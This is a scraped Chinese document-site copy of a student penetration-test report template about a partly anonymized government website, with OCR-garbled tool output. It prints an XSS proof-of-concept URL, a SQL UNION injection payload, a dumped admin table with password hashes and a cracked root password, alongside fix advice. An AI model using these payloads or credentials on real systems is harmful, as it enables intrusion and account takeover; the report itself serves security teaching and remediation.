网站渗透测试报告模板.docx

上传人:b****6 文档编号:6466162 上传时间:2023-01-06 格式:DOCX 页数:8 大小:225.20KB
下载 相关 举报
网站渗透测试报告模板.docx_第1页
第1页 / 共8页
网站渗透测试报告模板.docx_第2页
第2页 / 共8页
网站渗透测试报告模板.docx_第3页
第3页 / 共8页
网站渗透测试报告模板.docx_第4页
第4页 / 共8页
网站渗透测试报告模板.docx_第5页
第5页 / 共8页
点击查看更多>>
下载资源
资源描述

网站渗透测试报告模板.docx

《网站渗透测试报告模板.docx》由会员分享,可在线阅读,更多相关《网站渗透测试报告模板.docx(8页珍藏版)》请在冰豆网上搜索。

网站渗透测试报告模板.docx

网站渗透测试报告模板

电子信息学院渗透测试课程实验报告

实验名称:

实验时间:

学生姓名:

学生学号:

第1章概述3

1.1•测试目的3

12测试范围3

1.3•数据来源3

第2章详细测试结果4

2.1.测试工具4

2.2.测试步骤4

2.2.1.预扫描4

2.2.2.工具扫描4

2.2.3.人工检测5

2.2.4.其他5

2.3.测试结果5

2.3.1.跨站脚本漏洞6

2.3.2.SQL盲注7

2.3.2.管理后台10

2.4.实验总结11

第1章概述

1.1.测试目的

通过实施针对性的渗透测试,发现XXXX网站系统的安全漏洞,保障XXX

业务系统安全运行。

12测试范围

根据事先交流,本次测试的范围详细如下:

系统名称

XXX网站

测试域名

www.XX.gov.cn

测试时间

2014年10月16日-2014年10月17日

说明

本次渗透测试过程中使用的源IP可能为:

合肥

1.3数据来源

通过漏洞扫描和手动分析获取相关数据

第2章详细测试结果

2.1.测试工具

根据测试的范围,本次渗透测试可能用到的相关工具列表如下:

检测工具

用途和说明

WVS

WVS(WebVulnerabilityScanner是一个自动化的Web应用程序安全测试工具,它可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序。

Nmap

Linux,FreeBSD,UNIX,Windows下的网络扫描和嗅探工具

包。

Burpsuite

网络抓包工具,对网络的数据包传输进行抓取。

浏览器插件

对工具扫描结果进行人工检测,来判定冋题是否真实存在,具体方法依据实际情况而定。

其他

系统本身具备的相关命令,或者根据实际情况米用的其他工具。

2.2测试步骤

2.2.1.预扫描

通过端口扫描或主机查看,确定主机所开放的服务。

来检查是否有非正常的

服务程序在运行。

2.2.2.工具扫描

主要通过Nessus进行主机扫描,通过WVS进行WEB扫描。

通过Nmap进行端口扫描,得出扫描结果。

三个结果进行对比分析

223.人工检测

对以上扫描结果进行手动验证,判断扫描结果中的问题是否真实存在。

2.2.4.其他

根据现场具体情况,通过双方确认后采取相应的解决方式。

23测试结果

本次渗透测试共发现2个类型的高风险漏洞,1个类型的低风险漏洞。

这些漏洞可以直接登陆web管理后台管理员权限,同时可能引起内网渗透。

获取到的权限如下图所示:

可以获取web管理后台管理员权限,如下步骤所示:

通过SQL盲注漏洞获取管理员用户名和密码hash值,并通过暴力破解工具破解得到root用户的密码“mylove1993.”

Database;hnrllb

TabT.e:

admin

[2entries]

id|username|truename|password

十■■■■■■■v*vv*«*-s9v>ev*«v*>b■«*«vvwvww■晝■'+

1|admin|管理员|b52e31db4571463e1Q0ec568502c7026|

2|root||42O6©5b7B77d39b8f6f713f7e6$ad8d7|

利用工具扫描得到管理后台url,使用root/mylove1993.登陆后台如图:

FMHLtTsm-.9iW-HK-3.JUfifftot

mn札椅--sub

tttw菌帕豪购

(n»i!

c^5su*

BVMB

231.跨站脚本漏洞

风险等级:

漏洞描述:

攻击者可通过该漏洞构造特定带有恶意Javascript代码的URL并诱使浏览者

点击,导致浏览者执行恶意代码。

漏洞位置:

http:

//www.XXXnews.php?

kd=&page=324

变量:

page

http:

//www.XXX:

80/red/latest_news.php

变量:

kd

http:

//www.XXX.gov.cn:

80/red/search.php

变量:

kd

http:

//www.XXX:

80/red/sqmz2_do.php

变量:

num、psd

漏洞验证:

以其中一个XSS漏洞利用示范为例,在浏览器中输入:

http:

//www.XXXnews.php?

kd=&&page=324%27%22%28%29%26%25%3C/span%3E%3CScRiPt%20%3Eprompt%28985315%29%3C/ScRiPt%3E%3Cspan%3E

结果如图:

i

修复建议:

对传入的参数进行有效性检测,应限制其只允许提交开发设定范围之内的数据内容。

要解决跨站脚本漏洞,应对输入内容进行检查过滤,对输出内容的特定字符转义后输出,可采取以下方式:

在服务器端对所有的输入进行过滤,限制敏感字符的输入。

对输出进行转义,尤其是<>()&#这些符号。

<和>可以转义为<和>。

(和)可以转义为(和)。

#和&可以转义为#和&。

2.3.2.SQL盲注

风险等级:

高漏洞描述:

系统中测试页面中存在SQL注入漏洞,攻击者可通过该漏洞查看、修改或删除数据库条目和表以获取敏感信息。

漏洞位置:

http:

//www.XXX.gov.cm80/new/sqmz2_do.php?

num=2&psd=1&Submit3=%bf%aa

%ca%bc%b2%e9%d1%af

变量:

num

漏洞验证:

如下图所示,参数num存在UNIONquery类型的盲注:

Pldce:

657

Parameter:

nunt

Typ©UMIONquerj

Title:

MySQLUNIONquery{NULL)-gcolumns

Payload:

nuin=5UNIONALLSELECTMULL,NULL,CONCAT(017175767071,0x4d7^79696B7952584d70,0x7163786371).NULL,NULL,MULLNULL,NULLMULL*眸SSubnixA施琲日毗b吐亡惋-2站pq验n躺f

[14:

18:

17)

(14:

18:

21]

[INFD]testlngMySQL[INFO]confirmingHy

[14r18:

23]IINFO]zhQoack・andDBMSIsMySQL

webserveroperatings/sten:

Windows2008R2or7礎bapplicationtechnolcgy:

MlcrosattIIS7.5,ASP.KE7b欽kYridDBMS:

叽m乩D.0

利用工具列出数据库名

webserveroperatingsystofn:

VVindciws200SR2or7webapplicationtechnoloqy:

MicrosoftIIS7.5FASP.NETback-endDBMS:

MySQLS

[14;19;11][INFO]fetchingdstabasenames

availabledatabases[2]:

[*]hnrllb

[*]informatLon_schetna

利用工具列出数据库hnrllb中的表名

Datab曰se:

hnrllb[12tables]

+--+

|admi.n

|baseclasscom_'ledgermenzhen

|messageper_account|per_ybzhphototemp

ypxx

I心I

利用工具列出表admin中的列名

Database:

hnrltb

Table;admin

[6columns]

+-

・+

|Column

1Type

1

■4

1卜

1id|

1"泣.ip|

|lasr_timepassword

|truename|username

4-4

1int(5)

|varchar(20)

|varchar]20)varcharf100)

|varchar(20)

|\/archar(20)

1

1

1

1

1

1・d

1

1

11卜

禾U用工具列出表admin中id、usernametruename和password字段内容

Database;hnrllbTable:

admin[2entries]

id|username|truename|password

+----+-+

1adminSlim|b52e31db4571463s1e0ec568502c7026|

2root|42O6eSb7877d39b8f6f713f7e69ad8d7|

整改建议:

过滤(’"selectupdateorand)等特殊符号或者使用preparestatement函数,直接删除该测试页面,或部署web应用防护设备

232.管理后台

风险等级:

漏洞描述:

攻击者可通过工具或者人工猜解,获取管理后台url地址

漏洞位置:

http:

//www.XXX.gov.cn/kanetwork/admin」ogin/login.php

漏洞验证:

在浏览器中输入http:

//www.XXX.gov.cn/kanetwork/admin」ogin/login.php

结果如图:

整改建议:

修改管理后台url

24实验总结

通过本次渗透测试发现新网站系统存在的薄弱环节较多,后续完全修复工作

量较大:

1.应用系统在正式部署上线前应在内网先进行安全测试,通过安全测试后再放至公网;

2应用系统在开发过程中,应考虑网站应具备的安全功能需求,如:

登录框的验证码机制、口令的复杂度限制、口令的加密传输、后台管理页面限定IP

访问及上传功能安全机制等方面;

3.建立统一、切实可用的的基础环境规范并落实,如:

中间件的安装部署基线、操作系统的安装部署基线等;

4.部署网站防篡改及网页防火墙系统,保护DMZ区域内的所有WEB网站。

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 表格模板 > 合同协议

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1